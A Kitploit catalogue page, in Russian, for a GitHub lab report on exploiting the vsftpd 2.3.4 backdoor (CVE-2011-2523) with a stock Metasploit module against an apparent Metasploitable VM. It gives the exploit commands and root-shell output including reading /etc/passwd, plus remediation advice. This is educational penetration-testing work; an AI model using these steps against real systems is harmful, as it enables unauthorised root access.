Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vsftpd-234-vuln-report — Оценка уязвимости и эксплуатация vsftpd 2.3.4 (CVE-2011-2523) с использованием Metasploit. Полный отчет и подтверждение получения root-доступа включены. | Kitploit
Инструменты/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Оценка уязвимости и эксплуатация vsftpd 2.3.4 (CVE-2011-2523) с использованием Metasploit. Полный отчет и подтверждение получения root-доступа включены.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт
21 год назадЕщё не проверено

💥 vsftpd 2.3.4 Backdoor Exploit Report

Эксплуатация известной уязвимости в vsftpd 2.3.4 с помощью Metasploit.

📌 Детали цели

  • IP цели: 192.168.150.133
  • Сервис: FTP
  • Уязвимая версия: vsftpd 2.3.4
  • Модуль эксплойта: exploit/unix/ftp/vsftpd_234_backdoor
  • Пейлоад: Командная оболочка (TCP)

🔍 Сводка об уязвимости

vsftpd 2.3.4 содержит вредоносный бэкдор, который открывает командную оболочку на порту 6200 при получении специально сформированного имени пользователя (заканчивающегося на :)).

CVE: CVE-2011-2523


🚀 Шаги эксплуатации

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Доступ к оболочке получен:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Воздействие

Доступ к корневой оболочке даёт атакующему полный контроль над целевой системой, включая повышение привилегий, горизонтальное перемещение, эксфильтрацию данных и постоянный доступ.


✅ Рекомендация

  • НЕ используйте vsftpd 2.3.4.
  • Обновитесь до безопасной поддерживаемой версии.
  • Ограничьте внешний доступ к FTP.
  • Мониторьте подозрительный трафик на порту 6200.

📄 Отчёт

📝 Полный PDF-отчёт доступен в этом репозитории: vsftpd-exploit-report.pdf


📚 Ссылки

  • Rapid7 Module Info
  • CVE-2011-2523 - NVD

👨‍💻 Автор

Сделано с 🔥 от vedpakhare

Скачать инструмент